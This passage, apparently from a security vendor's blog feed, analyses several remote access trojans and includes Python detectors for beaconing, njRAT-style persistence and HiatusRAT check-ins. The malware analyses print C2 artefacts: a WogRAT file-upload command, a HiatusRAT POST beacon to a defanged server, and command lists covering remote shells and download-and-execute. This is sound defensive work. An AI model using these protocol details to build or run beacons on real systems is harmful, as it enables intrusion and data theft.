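if __name__ == "__main__":
    for hit in find_beacons(parse_log(SAMPLE_LOG)):
        print(f"{hit['src']} -> {hit['dst']}:{hit['port']}: "
              f"{hit['connections']} connections every ~{hit['mean_interval']:.0f}s "
              f"(interval CV {hit['interval_cv']:.2f})")
```

Real RATs often add random jitter to their sleep interval, so in practice you would widen max_cv, look at the distribution of gaps rather than a single statistic, and combine the result with the other signals mentioned above (unknown destination, odd port, uniform payload sizes) before raising an alert.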

Implement least privilege

The principle of least privilege means that applications, users, systems, and so on are restricted to the permissions and access they need to do their jobs. Applying it limits what an attacker can do through a RAT: the malware runs with the privileges of the account that launched it, so a non-administrative user account confines it until the attacker finds a way to escalate.

Are Remote Access Trojans illegal?

Well, yes, but actually, no. It all depends on how and for what you use it. It is not the program itself that is illegal but the way it is used. If you have written a Remote Access Trojan and run it in your own home lab, that is fine; the same goes for using it with written permission from the other party. Use a RAT maliciously, however, and you may face legal consequences. To keep the distinction clear, professionals use the term "remote access tool" for legitimate access and control and "remote access trojan" for illegitimate access and control.

WingsOfGod.dll – WogRAT Malware Analysis & Removal
https://gridinsoft.com/blogs/wograt-wingsofgod-analysis-removal/
Fri, 08 Mar 2024 17:17:12 +0000
WogRAT, also known as WingsOfGod RAT, is a relatively new remote access trojan that targets users in Asian countries. Named after its own file, Wingsofgod.dll, this malware has been attacking people since late 2022, spreading through an online notepad service.

What is WogRAT (WingsOfGod.dll)?

WogRAT is a classic example of a remote access trojan: a backdoor-like malicious program whose purpose is to provide remote access to the infected system. ASEC researchers were the first to detect and track the campaign. They emphasize that the malware primarily targets Asian countries, above all China, Japan, Singapore and Hong Kong.

The strange thing about WogRAT is that its distribution campaigns were never observed directly, even though some of the methods are described in the original research. The malware (more precisely, its loader) is disguised as a file posted on an online notepad service. Its file names suggest that the fraudsters offer WogRAT as some sort of system or program tweaking utility. This in turn suggests that initial distribution happens in "closed" places, such as messenger chats.

Encoded strings stored in aNotepad (screenshot)

Names for malware loader files that are available from aNotepad:

BrowserFixup.exe, ChromeFixup.exe, WindowsApp.exe, WindowsTool.exe, HttpDownload.exe, ToolKit.exe, flashsetup_LL3gjJ7.exe

WogRAT Malware Technical Analysis

As noted above, what is downloaded from the aNotepad site is only the malware loader, in encoded form. Upon execution it compiles itself on the fly and requests the actual payload from a different page hosted on the same site. The source of the second-stage payload differs from attack to attack.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 /OUT:C:\Users\\AppData\Local\Temp\RESF175.tmp c:\Users\\AppData\Local\Temp\2jahfobn\CSC51D40ACB8B5440B2A46FD286719924C.TMP – the command spawned when the loader compiles itself at runtime (cvtres.exe is the resource converter invoked by the .NET C# compiler; the compiler working out of random-named files in a user's Temp folder at runtime is itself a useful detection signal)

The downloaded file is a similar .NET assembly, Base64-encoded and stored as a text string on the source website. The loader decodes the payload and loads it into memory using the process hollowing technique.

C:\Windows\SysWOW64\WerFault.exe -u -p 8008 -s 2068

Upon startup, WogRAT collects basic system information by reading registry keys and executing commands. In particular, it gathers information about network connections, the OS version, the username, and some system policy settings. The malware bundles this data with information about its own process and sends it to the command server in an HTTP POST request. It then goes idle and waits for commands. The check-in request body looks like this:

act=on&bid=4844-1708721090438&name=System1\User1

WogRAT expects commands of a rather interesting shape. In simplified form each command consists of three elements:

Element – Value and purpose
task_id=%id% – text value identifying the task
task_type=%type% – numeric value selecting the action
task_data=%data% – path to the file the task applies to (a URL for downloads)

The resulting command is like the following:

task_id=upldr&task_type=3&task_data=C:\\Windows\System32\drivers\etc\hosts

The malware supports five types of operation: running a specified file, downloading a file, uploading a file, changing the idle time, and terminating execution. Not a huge list at first glance, but the ability to fetch and run arbitrary files is enough to turn it into a full-fledged backdoor.

How to remove WogRAT?

WogRAT is not the stealthiest malware out there; it relies more on its tricky distribution method and two-stage loader. Still, the number of hooks it creates in the system makes it hard to remove manually. For that reason, I recommend using GridinSoft Anti-Malware: a full scan with that program will be enough to remove the RAT and all of its components from the system.

Backdoor:Win32/Bladabindi!ml Analysis & Removal Guide
https://gridinsoft.com/blogs/backdoorwin32-bladabindiml-analysis-removal-guide/
Tue, 05 Mar 2024 14:37:22 +0000
Backdoor:Win32/Bladabindi!ml is a generic detection name used by Microsoft Defender. It refers to the backdoor malware known as njRAT, which is capable of taking over and controlling victims' computers. This article explains when the detection indicates a real infection and when it is a false positive.

What is Backdoor:Win32/Bladabindi!ml?

Backdoor:Win32/Bladabindi!ml is the Microsoft Defender detection name for njRAT malware, which is categorized as a backdoor. "Bladabindi" is one of several names antivirus vendors use to identify njRAT and its variants.

njRAT is a trojan that gets installed on a computer without the user's knowledge. It acts as a backdoor, giving attackers remote access to and control over the infected system. Once installed, njRAT can collect sensitive information, record keystrokes, steal passwords, intercept traffic, and even control the computer's webcam and microphone.

njRAT execution chain

njRAT spreads in a variety of ways: email attachments and malicious links, downloads from malicious websites, exploitation of software vulnerabilities, and social engineering. It can also self-propagate by infecting USB drives connected to an infected computer. Cybercriminals use all of these to trick users into installing njRAT.

Bladabindi Backdoor Threat Analysis

NjRAT features several versions, detected in different attacks. Nonetheless, they are not much different in terms of their capabilities and effects. Let’s have a look at what dangers a typical Bladabindi sample carries for the system.

Launch and Detection Evasion

Bladabindi employs several techniques to evade detection at launch. It ships with its own builder, which lets the operator configure the payload before it is delivered to the victim: the name of the executable, whether a startup key is created in the registry, the directory it will be placed in on the target system, the C&C host IP address and network port, among other settings.

njRAT builder and custom settings (screenshot)

Such customization lets njRAT slip past many of the static checks antivirus products rely on. The malware also uses multiple .NET obfuscators, making its code hard to analyze for humans and automated systems alike. These features make njRAT a tough nut both to analyze and to detect, and largely explain its success.

Establishing Persistence

After the initial system checks, the Bladabindi backdoor establishes persistence in two ways. It drops a startup item, typically into the C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp directory, and it creates a registry key with a unique name made of random characters and digits under HKEY_CURRENT_USER\Software\32. These entries make the malware run every time the system boots and keep its foothold across reboots. They are also the first places to look when triaging a suspected infection.

Registry entry created by the malware during installation (screenshot)
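An added example, not code from the article or from the njRAT author: a Python triage pass over autostart entries that flags the two persistence traits described above, a random-looking name and a location in a StartUp folder or an unusual key under HKCU\Software. The entries are constructed to resemble an Autoruns-style export, and the thresholds in looks_random are this example's assumptions.

```python
# Triage of autostart entries for njRAT-style persistence.
# Added example for this article; not code from Gridinsoft or the njRAT author.
# Assumption: entries come from an Autoruns-style export already loaded as
# dicts with "location", "name" and "image" keys (constructed below).
import math
import re

# Constructed sample: two legitimate entries and two that mimic what the
# article describes (a random-named item in the all-users StartUp folder and
# a random-named key under HKCU\Software\32).
SAMPLE_ENTRIES = [
    {"location": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "name": "OneDrive",
     "image": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe"},
    {"location": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
     "name": "SecurityHealth",
     "image": r"C:\Windows\system32\SecurityHealthSystray.exe"},
    {"location": r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp",
     "name": "5cd8f17f0b3e9a2.exe",
     "image": r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\5cd8f17f0b3e9a2.exe"},
    {"location": r"HKCU\Software\32",
     "name": "2b9e4f1a7c3d",
     "image": ""},
]

STARTUP_FOLDER = re.compile(r"\\start menu\\programs\\startup\b", re.IGNORECASE)


def shannon_entropy(s):
    """Bits per character of s; higher means less repetitive."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_random(name, min_len=8, min_digit_ratio=0.3, min_entropy=3.0):
    """Heuristic for builder-generated names: long, digit-heavy, high entropy.

    Thresholds are assumptions for this example; tune them against your own
    baseline of legitimate autorun names before relying on them.
    """
    stem = re.sub(r"\.[A-Za-z0-9]{1,4}$", "", name)  # drop a file extension
    if len(stem) < min_len or not re.fullmatch(r"[A-Za-z0-9]+", stem):
        return False
    digit_ratio = sum(ch.isdigit() for ch in stem) / len(stem)
    return digit_ratio >= min_digit_ratio and shannon_entropy(stem) >= min_entropy


def triage_autoruns(entries):
    """Return (name, reasons) for entries worth a closer look."""
    findings = []
    for e in entries:
        reasons = []
        if looks_random(e["name"]):
            reasons.append("random-looking name")
        if STARTUP_FOLDER.search(e["location"]) or STARTUP_FOLDER.search(e["image"]):
            reasons.append("runs from a StartUp folder")
        loc = e["location"].lower()
        # njRAT parks its entry under HKCU\Software\<random>, not in a Run key.
        if loc.startswith("hkcu\\software\\") and "\\currentversion\\run" not in loc:
            reasons.append("autostart outside the usual Run keys")
        if reasons:
            findings.append((e["name"], reasons))
    return findings


if __name__ == "__main__":
    for name, reasons in triage_autoruns(SAMPLE_ENTRIES):
        print(f"{name}: {', '.join(reasons)}")
```

Anything this flags still needs a human look (legitimate installers occasionally use hashed names too), but two reasons on one entry, as with the StartUp item above, is a strong signal worth pulling the file for analysis.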

Data Collection & Other Functionality

After finalizing its preparations, njRAT (a.k.a. Bladabindi) performs some basic check-ins with the command server. Depending on the response, the malware can go idle, start collecting user data, or pull an additional payload from the remote server. The overall list of actions it can perform is the following:

  • Executing remote shell commands
  • Downloading and uploading files
  • Capturing screenshots
  • Logging keystrokes
  • Camera and microphone access
  • Stealing credentials from web browsers and desktop crypto applications

Is Win32/Bladabindi!ml false positive?

Some legitimate programs have features or behaviors that antivirus software may mistake for suspicious, which leads Windows Defender to raise a false positive. Typical triggers are certain API calls, network requests, or data encryption that are characteristic of malware but also present in legitimate applications.

It is also worth noting that Microsoft Defender appends "!ml" to a detection name to indicate that the verdict came from its machine-learning engine. Although this method is highly effective, without confirmation from other detection engines it can produce false positives. If you get this detection on a file you built or trust, verify its digital signature and check its hash against a multi-engine scanner before excluding it from scans.

How to Remove Backdoor:Win32/Bladabindi!ml Virus?

The most reliable way to remove Backdoor:Win32/Bladabindi!ml is to use a trustworthy antivirus program with up-to-date virus databases. I recommend GridinSoft Anti-Malware; it is well suited to detecting and removing even sophisticated malware such as Bladabindi/njRAT.

After removing Win32/Bladabindi!ml, it is recommended to perform additional system scans to make sure that all threats have been successfully removed. And in the future, be vigilant when surfing the Internet and downloading files. Avoid visiting suspicious websites and opening attachments from unreliable sources.

Remcos RAT Targets South Korean Users Through Webhards
https://gridinsoft.com/blogs/remcos-rat-targets-south-korea-webhards/
Mon, 15 Jan 2024 21:39:20 +0000
The infamous Remcos RAT has reportedly started targeting South Korean users through files shared on the Webhards platform. By baiting users with cracked software and adult content, hackers get them to run a malicious script that in turn downloads and runs the dangerous remote access trojan.

Remcos RAT Uses Webhards to Spread

Recent research from the South Korean cybersecurity firm AhnLab describes a new Remcos RAT distribution campaign. The company names Webhards as this malware's source of choice for getting onto user devices. Webhards is a file-sharing platform popular among software pirates and people looking for free content. It has legitimate uses, but a number of analysts name it, along with torrents, a popular source of malware.

In the case of Remcos, hackers use "hot topics", either adult content or cracked versions of new games, to make the user download the infected package. The post on the aforementioned site then asks the user to run a Game.exe file present in the downloaded archive. Running that executable triggers a chain of VBS scripts that download the final payload.

ZIP archive with a cracked game, containing the aforementioned Game.exe file (screenshot). Source: AhnLab

After the download, another set of scripts injects Remcos into a system process called ServiceModelReg.exe. This is a built-in console utility that is used only during installation and has no further application, which makes it a convenient, rarely inspected host process for this instance of Remcos.

What is Remcos RAT?

Remcos is a remote access trojan marketed as a legitimate remote administration tool by the German firm BreakingSecurity. First offered for sale in 2016, it became particularly popular in 2020 and 2021, when threat actors spread it with Covid-themed emails. Since then its activity has become much more moderate, averaging about 30 samples per day during 2023.

Remcos RAT activity graph (12/17/2023 – 01/15/2024)

In terms of functionality, this malware is a classic RAT: Remcos provides full-featured remote access to the infected system, including the system menus and the file system. It can also record the screen, take screenshots, and set an activity alarm that notifies the operator when the victim is active. To tell target systems apart, the malware collects some basic information: OS version, date, time, and a few hardware details.

How to protect against threats?

The way the malware spreads already tells you how to protect yourself. In the case of Remcos, the obvious answer is to avoid cracked software. Since it is not just a malware risk but also copyright infringement, staying away from it is strongly recommended, and especially from websites known to be used for malware distribution.

For an additional, passive layer of protection, keep anti-malware software running in the background. A modern, well-maintained antivirus catches most attacks regardless of the type of malware involved. GridinSoft Anti-Malware is one you can rely on: its detection system offers strong protection in both proactive and reactive modes.

SugarGh0st RAT Targets Uzbekistan and South Korea
https://gridinsoft.com/blogs/sugargh0st-rat-targets-governments/
Fri, 01 Dec 2023 22:24:44 +0000
A new malicious campaign employs SugarGh0st RAT to target government agencies. Artifacts in the decoy documents hint at a potential Chinese-speaking actor.

SugarGh0st Uses Spear Phishing to Attack Governments

Researchers have uncovered a new wave of cyber threats targeting government entities in Uzbekistan and South Korea in recent cybersecurity developments. Utilizing a customized variant of the infamous Gh0st RAT, dubbed SugarGh0st, the campaign displays a sophisticated and multi-stage infection chain.

The lures focused on foreign ministry personnel and dealt with investment projects, account credentials, and internal memos. These topics were chosen because they are likely to make victims enable the malware unknowingly while viewing what look like legitimate work documents. Overall, the choice of targets is consistent with an operator working in the interests of the Chinese government, although attribution remains tentative.

Fake document used as a disguise to launch the malware attack (screenshot)

Multi-stage infection chain

Once delivered by email, the malicious documents trigger a multi-stage process to install SugarGh0st. JavaScript and shortcut (LNK) files execute commands that drop the RAT executable, decrypt it, and activate its full functionality in the background. Living-off-the-land binaries, DLL side-loading, and abuse of legitimate Windows utilities help hide the deployment from defenses and from the user. Aimed at foreign ministry networks, the operational security on display shows an adversary that carefully honed its tradecraft before going after sensitive agencies.

Following the installation, SugarGh0st offers advanced monitoring, exfiltration, and manipulation capabilities. This surpasses typical malware in commodity cybercrime operations. Functions allow recording keystrokes, activating webcams, executing files, or killing processes – all directed dynamically by attacker commands. Such comprehensive access risks the integrity of infected government agencies through unconstrained internal spying.

Depending on the victims' operational security practices, lateral movement could also jeopardize wider departments and ministry networks. Assessing the total damage remains difficult, but the implications are clearly severe: secrets stolen this way can affect international affairs and relations.

A Gh0st RAT Variant and Potential Chinese Connection

While the attribution remains speculative, artifacts in the decoy documents hint at a potential Chinese-speaking actor. Two files within the campaign contain Chinese characters in their “last modified by” names, suggesting a linguistic connection to China. As the name suggests, SugarGh0st represents an evolution of existing Chinese-linked Gh0st RAT variants in circulation for over 15 years. Developed by the Chinese group 红狼小组 (C.Rufus Security Team), Gh0st RAT has been active since 2008.

SugarGh0st retains the core functionalities of its predecessor but features customized reconnaissance capabilities and a modified communication protocol. The malware granted threat actors total remote control to pillage confidential data from infected networks. Enhancements include:

  • expanded anti-detection tactics
  • reconnaissance commands tailored to harvest documents and credentials
  • new communications disguising C2 servers as Google Drive domains

Attacks on government entities, particularly embassies and ministries, are nothing new. States have always spied on each other; only the tools differ. While most countries keep their tooling out of sight, Asian state-sponsored groups seem less concerned about exposure, with Chinese and North Korean actors among the most publicly visible.

HiatusRAT Used in Attacks on Taiwan Companies and U.S. Military
https://gridinsoft.com/blogs/hiatusrat-attacks-taiwan-us-military/
Tue, 22 Aug 2023 10:20:01 +0000
Recent attacks on U.S. military systems and Taiwanese companies stand out not only for the bold choice of targets but also for the toolkit used. Against both, the attackers used HiatusRAT as an initial access and reconnaissance tool. Aside from these attacks, the Hiatus trojan has other things to boast of.

US DoD and Taiwan Companies Cyberattacks

First, let's go over the attacks on these well-known organisations and companies. The long-running cyberattack on Taiwanese companies and at least one government organisation was reported in August 2023. Lumen researchers, who had studied the botnet established by HiatusRAT earlier, noticed a new flow of connections from Taiwanese IP ranges. Soon after, attacks on chemical production facilities, semiconductor manufacturers and one municipality were uncovered.

The story around the U.S. Department of Defense is a bit different. The same research group detected traffic to the IP addresses associated with the botnet not only from Taiwan but also from the US. Specifically, they found that the crooks behind the RAT used one of its Tier 2 servers to connect to a DoD server dedicated to defense contract work. Fortunately, no deep penetration happened; the hackers were most probably performing reconnaissance ahead of further actions.

HiatusRAT Analysis

The first thing that stands out about Hiatus is its network architecture. Instead of infecting endpoints, it targets networking devices, and has done so since its emergence in late 2021. Routers are gateways for enormous amounts of traffic, and full control over one can sometimes yield much more than hacking the computers behind it. Nothing stops Hiatus from delivering additional payloads to the target systems either. Aside from sniffing, a network of compromised routers also serves as a set of proxy servers that hide the operators' real IP address from the target server.

HiatusRAT functional scheme

To spread the payload, hackers look for business-grade routers running vulnerable firmware. The first members of the botnet were DrayTek routers, specifically the Vigor 2960 and 3900. Today the malware has builds for routers based on Arm, i386, x86-64 and MIPS/MIPS64 architectures. That covers a large number of devices, since firmware updates for network infrastructure are applied even more reluctantly than patches for ordinary software.

Execution flow

The attack chain that gets the RAT onto the router is still not fully understood. What is clear is that after gaining initial access, the attackers run a shell script that downloads the payload and an auxiliary utility. The latter is a specific build of tcpdump, the command-line packet capture tool.

On execution, HiatusRAT first checks for other processes listening on port 8816; if it finds any, it kills them and then proceeds with normal startup, which ensures a single running instance. Then comes a fairly classic step: the malware gathers basic information about the device it is running on, including its MAC address, architecture, firmware and kernel versions. It also collects detailed information about the file system and any files stored in the device's internal memory.

Once these checks are done, the malware reads a small JSON file that appears to be its configuration and retrieves the C2 server addresses from it. Besides the "main" server there is a second one that receives the packet captures gathered with the modified tcpdump tool. The first request to the control server is a classic HTTP POST with several fields carrying the system information gathered in the previous step.

HTTP POST Request Example
POST /master/Api/active?uuid=005056c00001 HTTP/1.1
Host: 104.250.48[.]192:443
Accept: */*
Content-Type: application/json
X_UTIME: 1674762549
X_UUID: 005056c00001
X_TOKEN: ffca0c6ca91ce7070c3e5e41d7c983a2
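The beacon above has a recognisable shape: a POST to /master/Api/active with the device uuid in the query string, the custom X_UTIME, X_UUID and X_TOKEN headers, and plain HTTP sent to port 443. The following detector, an added example that is not part of the original post, parses a captured request and lists which of those traits are present; the sample requests, the RFC 5737 address and the uuid/token values in them are constructed for illustration.

```python
# Added example: flag HiatusRAT-style C2 beacons by the request shape shown above.
import re

BEACON_PATH = "/master/Api/active"
REQUIRED_HEADERS = ("X_UTIME", "X_UUID", "X_TOKEN")
HEX32 = re.compile(r"^[0-9a-f]{32}$")  # X_TOKEN looks like a 32-char hex digest

def parse_request(raw):
    # Returns {'method', 'path', 'query', HEADER-NAME: value} or None if malformed.
    lines = [ln.strip() for ln in raw.strip().splitlines() if ln.strip()]
    parts = lines[0].split() if lines else []
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    path, _, query = parts[1].partition("?")
    req = {"method": parts[0], "path": path, "query": query}
    for ln in lines[1:]:
        name, sep, value = ln.partition(":")
        if sep:  # header names are case-insensitive, so normalise to upper case
            req[name.strip().upper()] = value.strip()
    return req

def beacon_indicators(raw):
    """List every HiatusRAT beacon trait present in one raw HTTP request."""
    req = parse_request(raw)
    if req is None:
        return []
    hits = []
    if req["method"] == "POST" and req["path"] == BEACON_PATH:
        hits.append("beacon path")
    if all(h in req for h in REQUIRED_HEADERS):
        hits.append("X_UTIME/X_UUID/X_TOKEN headers")
        query = dict(p.split("=", 1) for p in req["query"].split("&") if "=" in p)
        if query.get("uuid") == req["X_UUID"]:
            hits.append("query uuid matches X_UUID")
        if HEX32.match(req["X_TOKEN"]):
            hits.append("32-hex X_TOKEN")
    if req.get("HOST", "").endswith(":443"):  # cleartext HTTP on the TLS port
        hits.append("cleartext HTTP to port 443")
    return hits

def is_hiatus_beacon(raw):
    """True when both the beacon path and the custom header set are present."""
    hits = beacon_indicators(raw)
    return "beacon path" in hits and "X_UTIME/X_UUID/X_TOKEN headers" in hits

# Constructed samples: RFC 5737 address, made-up token; uuid/utime as in the post.
SAMPLE_BEACON = ("POST /master/Api/active?uuid=005056c00001 HTTP/1.1\n"
                 "Host: 192.0.2.10:443\nAccept: */*\nContent-Type: application/json\n"
                 "X_UTIME: 1674762549\nX_UUID: 005056c00001\n"
                 "X_TOKEN: 0123456789abcdef0123456789abcdef")
SAMPLE_BENIGN = "GET /index.html HTTP/1.1\nHost: example.com\nAccept: */*"
```

Run it over requests reconstructed from a packet capture or a proxy log; a hit on both the path and the header set is a strong signal, while the port-443 trait alone only warrants a closer look.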

HiatusRAT Functionality

I’ve already mentioned the tcpdump-like tool that supplies a significant part of the RAT’s functionality. However, it does not stop there. Hiatus can receive various commands from the command server that alter its behaviour or even force the malware to shut down. Notably, some of these functions have not been used so far, despite being available since the first release of the malware back in 2021.

Command: Description
Socks5: Sets up a SOCKS5 proxy on the hacked device that allows port forwarding/listening in compliance with RFC 1928.
File: Designates a file to read or delete on the infected host; can also upload the specified file.
Executor: Downloads and executes a file from the command server.
Tcp_forward: Comes with a specified forward IP and listening/forwarding port configuration. These changes are then applied to the router settings, making it forward any TCP traffic through the listening port.
Script: Similar to Executor; downloads and runs a script from the C2.
Shell: Spawns a remote shell on the compromised router. Together with Executor and Script, this makes up the malware delivery functionality.
Quit: Self-explanatory; forces the malware to shut down and cease all operations.

How to protect against network infrastructure attacks?

Well, Hiatus used to aim at routers of a few specific architectures and series, but now it covers quite a few possible variants. The ways hackers deploy this malware are still unclear, so there are not many reactive measures to recommend. Instead, I have several pieces of proactive advice for you to stick to.

Use advanced network protection solutions. Antivirus programs are not very effective at preventing this RAT infection. Network protection solutions, however, especially ones designed around heuristics, can detect and evict the intruder just by its behaviour. Network Detection and Response systems, combined with SOAR and UBA solutions, can do an excellent job of protecting the environment against tricky malware attacks.

Update (or upgrade) your networking devices regularly. Since the key to this malware’s injection is vulnerable router firmware, it is essential to keep the firmware updated. Keep an eye on malware attacks that were carried out with or via vulnerabilities in networking devices. Usually, device manufacturers release updates within weeks. There are, though, unfortunate cases where really old devices have reached end-of-life and are not supported in any form. In that case, you have no option but to replace the device, and that is the best and most definite way to get rid of the hazard.

Keep a good anti-malware program on hand. I’ve just said that anti-malware programs are not very effective in this case, and now I say it is nice to have one, so inconsistent of me, isn’t it? Not really: anti-malware programs serve as a preventive mechanism against the malware that HiatusRAT can deliver through its functionality. Multi-layer security structures are always harder to penetrate, at least without triggering the alarm.

HiatusRAT Used in Attacks on Taiwan Companies and U.S. Military
